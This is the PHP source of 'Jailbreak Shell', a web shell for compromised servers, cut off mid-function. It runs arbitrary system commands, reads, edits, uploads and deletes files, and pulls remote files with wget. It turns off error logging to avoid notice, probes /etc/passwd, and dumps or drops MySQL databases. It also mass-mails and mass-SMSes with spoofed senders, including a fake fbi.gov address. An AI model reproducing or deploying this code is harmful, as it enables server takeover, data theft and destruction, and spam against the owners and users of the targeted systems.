<?php

/*======================================*\
|| #################################### ||
|| # Jailbreak Shell by x iJB x       # ||
|| #################################### ||
|| # v1.00                            # ||
|| #################################### ||
\*======================================*/

// hardcoded variables, do not change unless you know what you're doing

$welcometext       = 'Jailbreak Shell | Welcome';

$lock              = true; // enable the username and password log on access to shell?
$jbshell_auth_user = 'jbshell'; // the login username to this shell
$jbshell_auth_pass = 'jbshell'; // the login password to this shell

$url               = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$rand              = mt_rand(100000,999999);

$traceback         = false; // will only work if $lock = true!
$traceback_email   = 'my-email@gmail.com'; // email to send tracebacks to
$traceback_from    = 'jailbreak-shell'.$rand.'@fbi.gov'; // don't change this, it'll help identify jailbreak shell, and should pass spam filters and email blocks too.
$traceback_subject = 'Jailbreak Shell - usage update'; // you can change this if necessary, but it's probably best to leave it as this.
$traceback_body    = 'Hello,
This email is to inform you that a user has successfully logged in to Jailbreak Shell.
If you were not expecting this email, please change the lock username and password for the shell.

The visitor\'s IP address is '.$_SERVER['REMOTE_ADDR'].'.
They logged in on '.date("D").' '.date("d").' '.date("F").' at '.date("h").':'.date("i").' '.date("a").'.

URL: '.$url.'.
					  
Thank you,
Jailbreak Shell.'; // don't edit the email body!
$traceback_headers = 'From: '.$traceback_from; // definitely do not change this!

$version           = '2.0.0-2'; // current version of the shell. don't change it or you may get a constant "update is available" message.
$update            = true; // enable or disable the shell update feature here
$update_url        = 'http://www.p0wersurge.com/jb/shell/latest.php?do=source'; // the url of the file that holds the latest update
$check_version_url = 'http://www.p0wersurge.com/jb/shell/latest.php?do=version'; // the url of the file that holds the latest version

$space             = getdisk(disk_free_space(realpath(getcwd())));
$total             = getdisk(disk_total_space(realpath(getcwd())));
$self              = basename($_SERVER['PHP_SELF']);

$secure_reset      = true; // if enabled, you will be emailed a key that will allow you to reset the default username and password to jbshell

// Thanks to lionaneesh!
@ini_set("memory_limit","9999M");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_restore("safe_mode");
@ini_restore("open_basedir");

if(function_exists('ini_set'))
{
	@ini_set('error_log',NULL);  // No alarming logs
	@ini_set('log_errors',0);    // No logging of errors
	@ini_set('file_uploads',1);  // Enable file uploads
	@ini_set('allow_url_fopen',1);   // allow url fopen 
} else {
	@ini_alter('error_log',NULL);
	@ini_alter('log_errors',0);
	@ini_alter('file_uploads',1);
	@ini_alter('allow_url_fopen',1);
}
@set_magic_quotes_runtime(0);
@set_time_limit(0);

// start the session
session_start();

// shell functions

function getdisk($size)
{
    if(!$size) return 0;
    if($size>=1073741824) return(round($size/1073741824)." GB");
    elseif($size>=1048576) return(round($size/1048576)." MB");
    elseif($size>=1024) return(round($size/1024)." KB");
    else return($size." B");
}
function thisdir($dir)
{
    $dir = str_replace("\\","/",$dir);
    $dir = str_replace("//","/",$dir);
    return $dir;
}
function getdisabled()
{
	error_reporting(E_ALL);
	$disabled_functions = @ini_get('disable_functions');
	if ($disabled_functions!='')
	{
		$arr = explode(',', $disabled_functions);
		sort($arr);
		for ($i=0; $i<count($arr); $i++)
		{
			echo $i.' - '.$arr[$i].'< br>';
		}
	} else {
	echo 'None';
	}
}
function backup_tables($host,$user,$pass,$name,$sqlname,$tables = '*')
{
  
  $link = mysql_connect($host,$user,$pass);
  mysql_select_db($name,$link);
  
  //get all of the tables
  if($tables == '*')
  {
    $tables = array();
    $result = mysql_query('SHOW TABLES');
    while($row = @mysql_fetch_row($result))
    {
      $tables[] = $row[0];
    }
  }
  else
  {
    $tables = is_array($tables) ? $tables : explode(',',$tables);
  }
  
  //cycle through
  foreach($tables as $table)
  {
    $result = mysql_query('SELECT * FROM '.$table);
    $num_fields = mysql_num_fields($result);
    
    @$return.= 'DROP TABLE '.$table.';';
    $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
    $return.= "\n\n".$row2[1].";\n\n";
    
    for ($i = 0; $i < $num_fields; $i++) 
    {
      while($row = mysql_fetch_row($result))
      {
        $return.= 'INSERT INTO '.$table.' VALUES(';
        for($j=0; $j<$num_fields; $j++) 
        {
          $row[$j] = addslashes($row[$j]);
          $row[$j] = @ereg_replace("\n","\\n",$row[$j]);
          if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
          if ($j<($num_fields-1)) { $return.= ','; }
        }
        $return.= ");\n";
      }
    }
    $return.="\n\n\n";
  }
  
  //save file
  $handle = fopen($sqlname,'w+');
  @fwrite($handle,$return);
  fclose($handle);
  //save file
}
function execmd($cmd,$d_functions="None")
{
    if($d_functions=="None") {$ret=passthru($cmd); return $ret;}
    $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
    $d_functions=str_replace(" ","",$d_functions);
    $dis_funcs=explode(",",$d_functions);
    foreach($funcs as $safe)
    {
        if(!in_array($safe,$dis_funcs)) 
        {
            if($safe=="exec")
            {
                $ret=@exec($cmd);
                $ret=join("\n",$ret);
                return $ret;
            }
            elseif($safe=="system")
            {
                $ret=@system($cmd);
                return $ret;
            }
            elseif($safe=="passthru")
            {
                $ret=@passthru($cmd);
                return $ret;
            }
            elseif($safe=="shell_exec")
            {
                $ret=@shell_exec($cmd);
                return $ret;
            }
            elseif($safe=="popen")
            {
                $ret=@popen("$cmd",'r');
                if(is_resource($ret))
                {
                    while(@!feof($ret))
                    $read.=@fgets($ret);
                    @pclose($ret);
                    return $read;
                }
                return -1;
            }
            elseif($safe="proc_open")
            {
                $cmdpipe=array(
                0=>array('pipe','r'),
                1=>array('pipe','w')
                );
                $resource=@proc_open($cmd,$cmdpipe,$pipes);
                if(@is_resource($resource))
                {
                    while(@!feof($pipes[1]))
                    $ret.=@fgets($pipes[1]);
                    @fclose($pipes[1]);
                    @proc_close($resource);
                    return $ret;
                }
                return -1;
            }
        }
    }
    return -1;
}
if(!isset($_REQUEST['do']) OR trim($_REQUEST['do']) == null)
{
	$_REQUEST['do'] = 'main';
}
function mainscreen()
{
	switch($_REQUEST['do'])
	{
		case 'main':
			global $self;
			global $version;
			global $update_url;
			global $check_version_url;
			global $lock;
			global $traceback;
			global $jbshell_auth_user;
			global $jbshell_auth_pass;
			if($lock == true)
			{
				if($jbshell_auth_user == 'jbshell')
				{
					$user_changed = "<span style='color:red;font-weight:bold;'>Unchanged</span>";
				} else {
					$user_changed = "<span style='color:lime;font-weight:bold;'>Changed</span>";
				}
				if($jbshell_auth_pass == 'jbshell')
				{
					$pass_changed = "<span style='color:red;font-weight:bold;'>Unchanged</span>";
				} else {
					$pass_changed = "<span style='color:lime;font-weight:bold;'>Changed</span>";
				}
				$lockstatus = "<span style='color:lime;font-weight:bold;'>Active</span>";
			} else {
				$user_changed = "<span style='color:red;font-weight:bold;'>Lock Inactive</span>";
				$pass_changed = "<span style='color:red;font-weight:bold;'>Lock Inactive</span>";
				$lockstatus = "<span style='color:red;font-weight:bold;'>Inactive</span>";
			}
			if($traceback == true)
			{
				$tracebackstatus = "<span style='color:lime;font-weight:bold;'>Active</span>";
			} else {
				$tracebackstatus = "<span style='color:red;font-weight:bold;'>Inactive</span>";
			}
			echo "<center>";
			echo "<h1>Welcome to Jailbreak Shell</h1>";
			echo "<h2>Navigation is as simple as using the links above.</h2>";
			echo "<h3>Developed by @xijailbreakx</h3>";
			echo "<h3>Got a suggestion? Post it on our community forum <a href='http://www.p0wersurge.com/forums/home/' target='_blank'>here</a>.</h3>";
			
			echo "<h2>Shell Status and Statistics</h2>";
			echo "<table width='50%'>";
				echo "<tr>";
					echo "<td width='50%'>Shell Version</td>";
					echo "<td width='50%'>$version</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Latest Version</td>";
					echo "<td width='50%'>".@file_get_contents($check_version_url)."</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Update URL</td>";
					echo "<td width='50%'>$update_url</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Version URL</td>";
					echo "<td width='50%'>$check_version_url</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Shell Lock</td>";
					echo "<td width='50%'>$lockstatus</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Shell Traceback</td>";
					echo "<td width='50%'>$tracebackstatus</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Default Username Changed?</td>";
					echo "<td width='50%'>$user_changed</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td width='50%'>Default Password Changed?</td>";
					echo "<td width='50%'>$pass_changed</td>";
				echo "</tr>";
			echo "</table>";
			echo "<br />";
		break;
		case 'info':
			echo "<center>";
			echo "<table width='95%' style='border:0;'>";
			echo "<th>Credits</th>";
			echo "</table>";
			echo "<table width='95%' style='border:0;'>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Jailbreak Shell</td>";
			echo "<td width='50%' style='border:0;'>x iJB x / x iJailBreak x</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Directory Functions & MySQL</td>";
			echo "<td width='50%' style='border:0;'>Mulciber Shell</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Lock</td>";
			echo "<td width='50%' style='border:0;'>lionaneesh / Ani-Shell</td>";
			echo "</tr>";
			echo "</table>";
			echo "<table width='95%' style='border:0;'>";
			echo "<th>Greetz</th>";
			echo "</table>";
			echo "<table width='95%' style='border:0;'>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Plum</td>";
			echo "<td width='50%' style='border:0;'>ProxieZ</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>AK47</td>";
			echo "<td width='50%' style='border:0;'>H3NDO</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>BoxHead</td>";
			echo "<td width='50%' style='border:0;'>w0rd</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Dark Avenger</td>";
			echo "<td width='50%' style='border:0;'>.t0asty</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Dante</td>";
			echo "<td width='50%' style='border:0;'>Nero</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>0B4M4</td>";
			echo "<td width='50%' style='border:0;'>KrypTiK</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Konvict</td>";
			echo "<td width='50%' style='border:0;'>Relevant</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Jack!</td>";
			echo "<td width='50%' style='border:0;'>Andy</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%' style='border:0;'>Aunstic</td>";
			echo "<td width='50%' style='border:0;'>Shad0w</td>";
			echo "</tr>";
			echo "</table>";
		break;
		case 'files':
		global $self;
		echo "<center>";
			if(isset($_REQUEST['del']))
			{
				if(!@unlink($_REQUEST['del']))
				{
					echo "Failed to delete ".$_REQUEST['del']."!";
				} else {
					echo "Deleted ".$_REQUEST['del']." successfully!";
				}
			}
			if(isset($_REQUEST['rename']))
			{
				echo "<form action='$self' method='post'>";
				echo "<input type='hidden' name='do' value='files' />";
				echo "<input type='hidden' name='dorename' value='true' />";
				echo "<table width='30%'>";
				echo "<tr>";
				echo "<td width='50%'>Current Filename</td>";
				echo "<td width='50%'>New Filename</td>";
				echo "</tr>";
				echo "<tr>";
				echo "<td width='50%'><input type='text' name='currentname' value='".$_REQUEST['rename']."' /></td>";
				echo "<td width='50%'><input type='text' name='newname' value='".$_REQUEST['rename']."' /></td>";
				echo "</tr>";
				echo "</table>";
				echo "<input type='submit' value='Rename' />";
				echo "</form>";
			}
			if(isset($_REQUEST['dorename']))
			{
				rename($_REQUEST['currentname'],$_REQUEST['newname']);
			}
			if(isset($_REQUEST['dl'])) // thanks to mulciber for this, ob_get_clean() saved my ass!
			{
				if(@!file_exists($_REQUEST['dl']))
				{
					echo "Permission denied!";
					break;
					break;
				}
				@$open_f = fopen($_REQUEST['dl'],'r');
				@$buffer = fread($open_f,filesize($_REQUEST['dl']));
				@ob_start();
				header("Content-type: application/octet-stream;");
				header("Content-length: ".strlen($buffer));
				header("Content-disposition: attachment; filename=".basename($_REQUEST['dl']).";");
				@ob_get_clean();
				@ob_end_flush();
			}
			
			echo "<table width='95%'>";
			echo "<tr>";
			echo "<td width='100%'>Current Directory: ".getcwd()."</td>";
			echo "</tr>";
			echo "</table>";
			echo "<table width='95%'>";
			echo "<th width='20%'>File / Dir Name</th>";
			echo "<th width='20%'>File / Dir Size</th>";
			echo "<th width='20%'>File Owner</th>";
			echo "<th width='20%'>Writeable</th>";
			echo "<th width='20%'>File Ops</th>";
			foreach(glob("*") as $file)
			{
				if(is_dir($file))
				{
					if(is_writeable($file))
					{
						$writeable = "Yes!";
					} else {
						$writeable = "No!";
					}
					echo "<tr width='100%'>";
					echo "<td width='20%'>".$file."</td>";
					echo "<td width='20%'>DIR</td>";
					echo "<td width='20%'>".fileowner($file)."</td>";
					echo "<td width='20%'>".$writeable."</td>";
					echo "<td width='20%'><a href='$self?do=files&rename=$file'>Rename</a> | <a href='$self?do=files&del=$file'>Delete</a></td>";
					echo "</tr>";
				}
			}
			foreach(glob("*") as $file)
			{
				if(!is_dir($file))
				{
					if(is_writeable($file))
					{
						$writeable = "Yes!";
					} else {
						$writeable = "No!";
					}
					echo "<tr width='100%'>";
					echo "<td width='20%'><a href='$self?do=fileedit&filename=$file'>".$file."</a></td>";
					echo "<td width='20%'>".round((filesize($file) / 1024))." KB</td>";
					echo "<td width='20%'>".fileowner($file)."</td>";
					echo "<td width='20%'>".$writeable."</td>";
					echo "<td width='20%'><a href='$self?do=files&rename=$file'>Rename</a> | <a href='$self?do=files&del=$file'>Delete</a> | <a href='$self?do=files&dl=$file'>Download</a></td>";
					echo "</tr>";
				}
			}
			echo "</table>";
		break;
		case 'fileedit':
			global $self;
			echo "<center>";
			if(isset($_REQUEST['filename']))
			{
				echo "<form action='$self' method='post'>";
				echo "<input type='hidden' name='do' value='filesave' />";
				echo "<input type='hidden' name='filename' value='".$_REQUEST['filename']."' />";
				echo "<textarea rows='20' cols='100' name='filecontent'>";
				echo htmlentities(file_get_contents($_REQUEST['filename']));
				echo "</textarea>";
				echo "<br />";
				echo "<input type='submit' value='Save' />";
				echo "</form>";
			} else {
				echo "No file selected for editing!";
			}
		break;
		case 'filesave':
			global $self;
			echo "<center>";
			if((isset($_REQUEST['filecontent'])) && (isset($_REQUEST['filename'])))
			{
				if(file_put_contents(html_entity_decode($_REQUEST['filename']),$_REQUEST['filecontent']))
				{
					echo "File saved successfully!";
				} else {
					echo "Error while saving file!";
				}
			} else {
				echo "No file loaded!";
			}
		break;
		case 'cmd':
			echo '<textarea rows="20" cols="100">';
			if($_REQUEST['do'] == 'cmd')
			{
				@execmd($_REQUEST['cmd']);
			}
			echo '</textarea>';
		break;
		case 'uploadfile':
			if ($_FILES["file"]["error"] > 0)
			{
				echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
			} else {
			if (file_exists($_FILES["file"]["name"]))
			{
				unlink($_FILES["file"]["name"]);
			}
			move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
			echo "Uploaded file to: " . $_FILES["file"]["name"];
			}
		break;
		case 'createfile':
			if(file_exists($_POST['createfilename']))
			{
				echo "File '".$_POST['createfilename']."' already exists!";
			} else {
				/*global $self;
				echo "<form action='".$self."' type='post'>";
				echo "<input type=\"hidden\" name=\"do\" value=\"makefile\" />";
				echo "<textarea rows=\"20\" cols=\"100\" name=\"createfilecontent\">";
				echo "</textarea>";
				echo "<br />";
				echo "<input type='hidden' name='filename' value='".$_POST['createfilename']."' />";
				echo "<input type=\"submit\" name=\"submit\" value=\"Save\" />";
				echo "</form>";*/
				if(fopen($_POST['createfilename'],'w'))
				{
					echo "File created!";
				} else {
					echo "Failed to create file!";
				}
			}
		break;
		case 'createdirectory':
			if(file_exists($_POST['createdirname']))
			{
				die("A directory with that name already exists!");
			} else {
				if(!mkdir($_POST['createdirname']))
				{
					echo "Failed to create directory!";
				} else {
					echo "Created directory successfully!";
				}
			}
		break;
		case 'wgetfile':
			if(!execmd("wget ".$_POST['wgetlink']))
			{
				echo "Could not download file!";
			} else {
				echo "File was downloaded successfully!";
			}
		break;
		case 'makefile':
			$handle = fopen($_POST['filename'],'w');
			if(!$handle)
			{
				die("Could not create file!");
			} else {
			if(!fwrite($handle,$_POST['createfilecontent']))
			{
				die("Could not write content to file!");
			} else {
				fclose($handle);
			}
			}
		break;
		case 'secinfo':
			// few variables to find security information and provide results for security rating
			$open_basedir = (@ini_get("open_basedir")=='')?"Off":"On";
			$magic_quotes = get_magic_quotes_gpc()?"On":"Off";
			$passwd_readable = @is_readable("/etc/passwd")?"Yes":"No";
			$mysql_on = function_exists("mysql_connect")?"On":"Off";
			$register_globals_on = (@ini_get('register_globals')=='')?"Off":"On";
			$remote_inclusions = (@ini_get('allow_url_include')=='')?"Off":"On";
			$curl_on = function_exists("curl_init")?"On":"Off";
			$php_version = phpversion();
			$php_safe_mode = (@ini_get("safe_mode")=='')?"Off":"On";
			
			// start score calculations
			if($open_basedir == "Off")
			{
				$open_basedir_score = 1;
			} else {
				$open_basedir_score = 0;
			}
			if($magic_quotes == "Off")
			{
				$magic_quotes_score = 1;
			} else {
				$magic_quotes_score = 0;
			}
			if($passwd_readable == "No")
			{
				$passwd_readable_score = 1;
			} else {
				$passwd_readable_score = 0;
			}
			if($mysql_on == "Off")
			{
				$mysql_on_score = 1;
			} else {
				$mysql_on_score = 0;
			}
			if($register_globals_on == "Off")
			{
				$register_globals_on_score = 1;
			} else {
				$register_globals_on_score = 0;
			}
			if($remote_inclusions == "Off")
			{
				$remote_inclusions_score = 1;
			} else {
				$remote_inclusions_score = 0;
			}
			if($curl_on == "Off")
			{
				$curl_on_score = 1;
			} else {
				$curl_on_score = 0;
			}
			if($php_version > "4.9.9")
			{
				$php_version_score = 1;
			} else {
				$php_version_score = 0;
			}
			if($php_safe_mode == "On")
			{
				$php_safe_mode_score = 1;
			} else {
				$php_safe_mode_score = 0;
			}
			
			// start security rating calculations
			$security_rating = $open_basedir_score + $magic_quotes_score + $passwd_readable_score + $mysql_on_score + $register_globals_on_score + $remote_inclusions_score + $curl_on_score + $php_version_score + $php_safe_mode_score;
			
			echo "<center>";
			echo "<table width='80%'>";
			echo "<tr>";
			echo "<td width='100%'>Security Info</td>";
			echo "</tr>";
			echo "</table>";
			echo "<table width='80%'>";
			echo "<tr>";
			echo "<th width='50%'><u>PHP Version</u></td>";
			echo "<th width='50%'><u>PHP Safe Mode</u></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'>$php_version</td>";
			echo "<td width='50%'>$php_safe_mode</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<th width='50%'><u>Open Basedir</u></td>";
			echo "<th width='50%'><u>Magic Quotes</u></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'>$open_basedir</td>";
			echo "<td width='50%'>$magic_quotes</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<th width='50%'><u>Register Globals</u></td>";
			echo "<th width='50%'><u>Remote Inclusions</u></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'>$register_globals_on</td>";
			echo "<td width='50%'>$remote_inclusions</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<th width='50%'><u>MySQL</u></td>";
			echo "<th width='50%'><u>cURL</u></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'>$mysql_on</td>";
			echo "<td width='50%'>$curl_on</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<th width='50%'><u>Read /etc/passwd?</u></td>";
			echo "<th width='50%'><u>Rating</u></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'>$passwd_readable</td>";
			echo "<td width='50%'>$security_rating / 9</td>";
			echo "</tr>";
			echo "</table>";
		break;
		case 'reverseip':
			echo "Reverse IP";
			echo "<br />";
			echo "<form action='http://www.my-ip-neighbors.com/' method='post'>";
			echo "Domain or IP address:";
			echo "<input type='text' size='50' name='domain' value='".$_SERVER['SERVER_ADDR']."' />";
			echo "<input type='submit' name='submit' value='Search' />";
			echo "</form>";
		break;
		case 'mailer':
			global $self;
			echo "<center>";
			echo "<table width='80%'>";
			echo "<tr>";
			echo "<td width='100%'>Email System</td>";
			echo "</tr>";
			echo "</table>";
			echo "<form action='$self' method='post'>";
			echo "<input type='hidden' name='do' value='sendmail' />";
			echo "<table width='80%'>";
			echo "<tr>";
			echo "<td width='20%'>Send Email To:</td>";
			echo "<td width='80%'><input type='text' name='mailto' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>Send Email From:</td>";
			echo "<td width='80%'><input type='text' name='mailfrom' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>Email Subject:</td>";
			echo "<td width='80%'><input type='text' name='mailsubject' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>How Many:</td>";
			echo "<td width='80%'><input type='text' name='mailamount' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>Email Body:</td>";
			echo "<td width='80%'><textarea rows='10' cols='50' name='mailbody'></textarea></td>";
			echo "</tr>";
			echo "</table>";
			echo "<input type='submit' name='submit' value='Send' />";
			echo "</form>";
		break;
		case 'sms':
			global $self;
			echo "<center>";
			echo "<table width='80%'>";
			echo "<tr>";
			echo "<td width='100%'>SMS System</td>";
			echo "</tr>";
			echo "</table>";
			echo "<form action='$self' method='post'>";
			echo "<input type='hidden' name='do' value='sendsms' />";
			echo "<table width='80%'>";
			echo "<tr>";
			echo "<td width='20%'>Send SMS To (use a full phone number including area code):</td>";
			echo "<td width='80%'><input type='text' name='mailto' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>Send SMS From (email address):</td>";
			echo "<td width='80%'><input type='text' name='mailfrom' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>SMS Subject:</td>";
			echo "<td width='80%'><input type='text' name='mailsubject' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>How Many:</td>";
			echo "<td width='80%'><input type='text' name='mailamount' size='65' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='20%'>SMS Body:</td>";
			echo "<td width='80%'><textarea rows='10' cols='50' name='mailbody'></textarea></td>";
			echo "</tr>";
			echo "</table>";
			echo "<input type='submit' name='submit' value='Send' />";
			echo "</form>";
		break;
		case 'sendmail':
			$mailto = $_REQUEST['mailto'];
			$mailfrom = $_REQUEST['mailfrom'];
			$mailsubject = $_REQUEST['mailsubject'];
			$mailamount = $_REQUEST['mailamount'];
			$mailbody = $_REQUEST['mailbody'];
			$headers  = "From: $mailfrom\r\n";
			$headers .= 'MIME-Version: 1.0' . "\n";
			$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
			$sentmail = 0;
			$succeeded = 0;
			$failed = 0;
			while($sentmail < $mailamount)
			{
				if(!@mail($mailto, $mailsubject, $mailbody, $headers))
				{
					$sentmail++;
					echo "Failed to send mail $sentmail...<br />";
					$failed++;
				} else {
					$sentmail++;
					echo "Sent message $sentmail...<br />";
					$succeeded++;
				}
			}
			echo "<br />";
			echo "Sent mail $succeeded times!<br />";
			echo "Failed to send mail $failed times!";
		break;
		case 'sendsms':
			$mailto = $_REQUEST['mailto'];
			$mailfrom = $_REQUEST['mailfrom'];
			$mailsubject = $_REQUEST['mailsubject'];
			$mailamount = $_REQUEST['mailamount'];
			$mailbody = $_REQUEST['mailbody'];
			$headers  = "From: $mailfrom\r\n";
			$headers .= 'MIME-Version: 1.0' . "\n";
			$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
			$sentmail = 0;
			$succeeded = 0;
			$failed = 0;
			while($sentmail < $mailamount)
			{
				if(!@mail($mailto, $mailsubject, $mailbody, $headers))
				{
					$sentmail++;
					echo "Failed to send mail $sentmail...<br />";
					$failed++;
				} else {
					$sentmail++;
					echo "Sent message $sentmail...<br />";
					$succeeded++;
				}
			}
			echo "<br />";
			echo "Sent mail $succeeded times!<br />";
			echo "Failed to send mail $failed times!";
		break;
		case 'sql':
			global $self;
			echo "<center>";
			if(!isset($_SESSION['mysqlcon']) && !isset($_POST['login']))
			{
				echo "<form action='$self' method='post'>";
				echo "<input type='hidden' name='do' value='sql' />";
				echo "<table width='80%'>";
				echo "<tr>";
				echo "<td width='100%'>SQL Connection</td>";
				echo "</tr>";
				echo "</table>";
				echo "<table width='80%'>";
				echo "<tr>";
				echo "<td width='50%'>MySQL Host</td>";
				echo "<td width='50%'><input type='text' name='sql_host' size='50' value='localhost' /></td>";
				echo "</tr>";
				echo "<tr>";
				echo "<td width='50%'>MySQL Username</td>";
				echo "<td width='50%'><input type='text' name='sql_user' size='50' /></td>";
				echo "</tr>";
				echo "<tr>";
				echo "<td width='50%'>MySQL Password</td>";
				echo "<td width='50%'><input type='text' name='sql_pass' size='50' /></td>";
				echo "</tr>";
				echo "<tr>";
				echo "<td width='50%'>MySQL Port</td>";
				echo "<td width='50%'><input type='text' name='sql_port' size='50' value='3306' /></td>";
				echo "</tr>";
				echo "</table>";
				echo "<input type='submit' name='login' value='Login' />";
				echo "</form>";
			} elseif(!isset($_SESSION['mysqlcon']) && isset($_POST['login'])) {
				extract($_POST);
				$sql_connection = @mysql_connect($sql_host.":".$sql_port,$sql_user,$sql_pass);
				if($sql_connection)
				{
					$_SESSION['sql_host'] = $sql_host;
					$_SESSION['sql_port'] = $sql_port;
					$_SESSION['sql_user'] = $sql_user;
					$_SESSION['sql_pass'] = $sql_pass;
					$_SESSION['mysqlcon'] = true;
					header("Location: $self?do=sqledit");
				} else {
					echo "Failed to log in!";
				}
			} elseif(isset($_SESSION['mysqlcon'])) {
				header("Location: $self?do=sqledit");
			} else {
				header("Location: $self?do=sqledit");
			}
		break;
		case 'sqledit':
			global $self;
			echo "<center>";
			extract($_SESSION);
			if(isset($_REQUEST['act']) && $_REQUEST['act'] == 'logout')
			{
				session_destroy();
				header("Location: $self?do=sql");
			}
			$sql_connection = @mysql_connect($sql_host.":".$sql_port,$sql_user,$sql_pass);
			if($sql_connection)
			{
				if(isset($_REQUEST['dropdb']))
				{
					if(@mysql_query("DROP DATABASE ".trim($_REQUEST['dropdb']),$sql_connection))
					{
						echo "Dropped database successfully!";
					} else {
						echo "Failed to drop database!";
					}
				}
				if(isset($_REQUEST['downloaddb']))
				{
					if(@!backup_tables($sql_host,$sql_user,$sql_pass,$_REQUEST['downloaddb'],$_REQUEST['downloaddb'].".sql"))
					{
						echo "Database dumped, download <a href='".$_REQUEST['downloaddb'].".sql'>here</a>!";
					} else {
						echo "Failed to dump database.";
					}
				}
				if(isset($_REQUEST['database']))
				{
					$show_tables = mysql_query("SHOW TABLES FROM ".$_REQUEST['database']);
					
					if(isset($_REQUEST['droptbl']))
					{
						$droptblq = @mysql_query("DROP TABLE $_REQUEST[database].$_REQUEST[droptbl]");
						if(!$droptblq)
						{
							echo "Failed to drop $_REQUEST[database].$_REQUEST[droptbl]!";
						} else {
							echo "$_REQUEST[database].$_REQUEST[droptbl] dropped successfully!";
						}
					}
					
					echo "<table width='60%'>";
					echo "<th width='50%'>Table Name</th>";
					echo "<th width='15%'>Column Count</th>";
					echo "<th width='35%'>Operations</th>";
					while($row = mysql_fetch_array($show_tables))
					{
						$ccount = mysql_query("SHOW COLUMNS FROM ".$_REQUEST['database'].".".$row[0]);
						$c = @mysql_num_rows($ccount);
						echo "<tr>";
							echo "<td width='50%'>$row[0]</td>";
							echo "<td width='15%'>$c</td>";
							echo "<td width='35%'>Dump | <a href='$self?do=sqledit&database=$_REQUEST[database]&droptbl=$row[0]'>Drop</a></td>";
						echo "</tr>";
					}
					mysql_free_result($show_tables);
					echo "</table>";
				}
				$sql_databases = mysql_list_dbs($sql_connection);
				echo "<table width='60%'>";
					echo "<tr>";
						echo "<th width='50%'>Database Name</th>";
						echo "<th width='15%'>Table Count</th>";
						echo "<th width='35%'>Operations</th>";
					echo "</tr>";
				echo "<tr>";
				while($row = mysql_fetch_object($sql_databases))
				{
					$sql_tables = mysql_query("SHOW TABLES FROM ".$row->Database);
					$sql_table_count = mysql_num_rows($sql_tables);
					echo "<tr><td width='50%'><a href='$self?do=sqledit&database=$row->Database'>".$row->Database."</a></td><td width='15%'>".$sql_table_count."</td><td width='35%'><a href='$self?do=sqledit&downloaddb=".$row->Database."'>Dump</a> | <a href='$self?do=sqledit&dropdb=".$row->Database."'>Drop</a></td></tr>";
				}
				echo "</tr>";
				echo "</table>";
				echo "<b>Logged in as ".$sql_user."@".$sql_host.":".$sql_port."</b> | <a href='$self?do=sqledit&act=logout'>Logout</a>";
			} else {
				$_SESSION = array();
				session_destroy();
				header("Location: $self?do=sql");
			}
		break;
		case 'sqldbs':
			if(isset($_REQUEST['downloaddb']))
			{
				
			}
			echo "<table width='50%'>";
			echo "<tr>";
			echo "<td width='100%'>SQL Databases</td>";
			echo "</tr>";
			echo "</table>";
			echo "<table width='50%'>";
			echo "<tr>";
			echo "<td width='55%'>Databases</td><td width='15%'>Table Count</td><td width='15%'>Download Database</td><td width='15%'>Drop Database</td>";
			echo "</tr>";
			echo "</table>";
			echo "<table width='50%'>";
			echo "<tr>";
			global $self;
			while($row = mysql_fetch_object($sql_databases)):
				$sql_tables = mysql_query("SHOW TABLES FROM ".$row->Database);
